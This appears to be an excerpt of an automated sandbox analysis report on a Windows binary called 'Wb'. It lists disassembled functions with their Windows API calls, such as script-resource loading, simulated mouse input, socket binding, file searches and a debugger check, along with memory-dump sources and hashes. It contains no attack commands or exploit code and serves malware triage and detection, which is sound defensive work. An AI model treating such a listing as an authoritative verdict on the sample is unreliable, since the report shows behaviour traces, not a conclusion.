                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F01497A7102126BFB2462BC9DC9FFF72ECAB18280F150560FDC2E21C9D52C8C0883A0
                                                                                                                                                                                                                                                                                                        Function 00FEBCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEBD54
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEBD78
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEBEFF
                                                                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,010546D0), ref: 00FEBF11
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0108221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00FEBF89
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,01082270,000000FF,?,0000003F,00000000,?), ref: 00FEBFB6
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEC0CB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 314583886-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3bbe0dbb587e948a7e05628a94b45714b99ebb94b2b30f89719f7bef8141507e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 173c10bd8e2184ed23a34d5074abc8e72b264f825f58c5cd263dd27164622016
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bbe0dbb587e948a7e05628a94b45714b99ebb94b2b30f89719f7bef8141507e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFC12672D042C5AFDB209F6ADC41BAF7BB9EF41320F1441AAE5809B251E7358E41EB90
                                                                                                                                                                                                                                                                                                        Function 01023A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FF56C2,?,?,00000000,00000000), ref: 01023A1E
                                                                                                                                                                                                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FF56C2,?,?,00000000,00000000), ref: 01023A35
                                                                                                                                                                                                                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00FF56C2,?,?,00000000,00000000,?,?,?,?,?,?,00FB66CE), ref: 01023A45
                                                                                                                                                                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00FF56C2,?,?,00000000,00000000,?,?,?,?,?,?,00FB66CE), ref: 01023A56
                                                                                                                                                                                                                                                                                                        • LockResource.KERNEL32(00FF56C2,?,?,00FF56C2,?,?,00000000,00000000,?,?,?,?,?,?,00FB66CE,?), ref: 01023A65
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                                        • String ID: SCRIPT
                                                                                                                                                                                                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                                        • Opcode ID: ae2e00d18108bfab70d3929ba71190ca421905f01a97de365a423a02401161ca
                                                                                                                                                                                                                                                                                                        • Instruction ID: 50cd83935a06f4e4b4f7f5a968e0c947eaca714c9ff04b7e4a283f64b317c81e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae2e00d18108bfab70d3929ba71190ca421905f01a97de365a423a02401161ca
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30117CB4600701BFE7318BA9DE88F277BB9EFC9B50F14426DF5429A150DB76E8008B20
                                                                                                                                                                                                                                                                                                        Function 01032D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 01032D45
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102EF33: GetWindowRect.USER32(?,?), ref: 0102EF4B
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 01032D6F
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 01032D76
                                                                                                                                                                                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 01032DB2
                                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 01032DDE
                                                                                                                                                                                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01032E3C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 80a6d81fab4cdc53414b27bdfe0bdbe9f3e1f6224d027b8518a9611949bd13d0
                                                                                                                                                                                                                                                                                                        • Instruction ID: cd338b5d3c7e0a96cfa4f4bac5a9dfeab1eee65f0aad731bda745ebf1efa7c6b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80a6d81fab4cdc53414b27bdfe0bdbe9f3e1f6224d027b8518a9611949bd13d0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A931CF76505316ABD720EF58C848B9AB7E9FFD9314F000919F9C997180DB75E908CBD2
                                                                                                                                                                                                                                                                                                        Function 0102A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0102A5BD
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0102A6D0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010242B9: GetInputState.USER32 ref: 01024310
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010242B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 010243AB
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0102A5ED
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0102A6BA
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                                        • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                                        • Opcode ID: 77950f83a041248914c8f4eef3277af01085ba4174af3c86f28fafeff926eb83
                                                                                                                                                                                                                                                                                                        • Instruction ID: 99862f0f3e8b647e63f38ce96bc57f253dce5f94c5386782d2ebbf049ded3783
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77950f83a041248914c8f4eef3277af01085ba4174af3c86f28fafeff926eb83
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD41C371A0021ADFDF60DFA4CD49AEEBBB4FF58310F10409AE945A31A1EB359A44CF60
                                                                                                                                                                                                                                                                                                        Function 00FB22AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,?), ref: 00FB233E
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00FB2421
                                                                                                                                                                                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00FB2434
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Color$Proc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 929743424-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 72e76eefd4782e3b6d7d8b35dd4d02eab95153945546e621475f777f3d834e92
                                                                                                                                                                                                                                                                                                        • Instruction ID: 97b0eb8d6494f90b797fb2a0d69a4e9409f827d943c963daa0b3df686fd40dfa
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72e76eefd4782e3b6d7d8b35dd4d02eab95153945546e621475f777f3d834e92
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC814AF2608004BEE278757A8CD8FFF259DEF46360B190119F242C65A9C95D8F41FA76
                                                                                                                                                                                                                                                                                                        Function 01032263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01033AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 01033AD7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01033AAB: _wcslen.LIBCMT ref: 01033AF8
                                                                                                                                                                                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 010322BA
                                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 010322E1
                                                                                                                                                                                                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 01032338
                                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 01032343
                                                                                                                                                                                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 01032372
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ec69c708bd99fddcb720a53b248f3b4bcce286237ac69a1940b77026624dc4a2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6c71dfd6d5fac2b896d41df46854d6f74a7e5ae92cbe32b0034622e6172938f8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec69c708bd99fddcb720a53b248f3b4bcce286237ac69a1940b77026624dc4a2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5751A375A00200AFE710EF64C986FAA77E9AB85754F04C09CF9465F2C3C675ED42DBA1
                                                                                                                                                                                                                                                                                                        Function 0102D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0102CC63,00000000), ref: 0102D97D
                                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 0102D9B4
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,0102CC63,00000000), ref: 0102D9F9
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0102CC63,00000000), ref: 0102DA0D
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0102CC63,00000000), ref: 0102DA37
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f8b157c3c8b6fae7d891d6fe6a91872053c47fb8dc43504e7eb94f72faa61adf
                                                                                                                                                                                                                                                                                                        • Instruction ID: 261acf8f16f7ecac23ed17c7ed17a0129c433da08712cc9fa102052299604ad4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8b157c3c8b6fae7d891d6fe6a91872053c47fb8dc43504e7eb94f72faa61adf
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67316B71604215EFDB20DFE9D884EAEBBF9EB10350B10446EF586D2140DB35EE409B60
                                                                                                                                                                                                                                                                                                        Function 010426DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 76556461af8a98117c1c6ffdb18d430eecdaf22523c5f917fe5a34d7bb12672b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3ec340df0935702c439a391e1ec2d17466a107ef5c6d55528c1b0cc9fcd5892b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76556461af8a98117c1c6ffdb18d430eecdaf22523c5f917fe5a34d7bb12672b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7621D6B57002119FE761DF2AE8C4B5A7BD5BF94314B1880B8E8C98B241DB76E842CB90
                                                                                                                                                                                                                                                                                                        Function 0101E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?,00FF46AC), ref: 0101E482
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0101E491
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0101E4A2
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0101E4AE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 663ee097f6cb22be0b28cd21a6930a9037761e6cba2c780d5ab3338bf9948c5f
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3bf0499c2408b58d918deefd230f3eb423d6785f89c85d8852a60370de18f075
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 663ee097f6cb22be0b28cd21a6930a9037761e6cba2c780d5ab3338bf9948c5f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5F02730400910579222267CEA4D46E36ADAF11335B004341FDF1C10E4DB7CD8404382
                                                                                                                                                                                                                                                                                                        Function 0100E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LocalTime
                                                                                                                                                                                                                                                                                                        • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                                        • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                                        • Opcode ID: 35c45dfc5a2693fb77e3a61a6582a38656361d49aa5643960d455696b3f1ebf6
                                                                                                                                                                                                                                                                                                        • Instruction ID: fc991fd7f89402700391daa4450086fe69a9911aef0b7fb27fb4e26342ccd83e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35c45dfc5a2693fb77e3a61a6582a38656361d49aa5643960d455696b3f1ebf6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9D012F5C04109E6DB95DA90EE89DBD737CAB1C340F048C56F986B1080E62499089721
                                                                                                                                                                                                                                                                                                        Function 00FE2992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00FE2A8A
                                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00FE2A94
                                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00FE2AA1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b6b25d54619aaca6c33379213179f7d6f29914714f0115aec1239a5aca6677bc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 665def7cc9b299a6f2058a438ac6a86111f6d09d89a3673be23f9268f4785d28
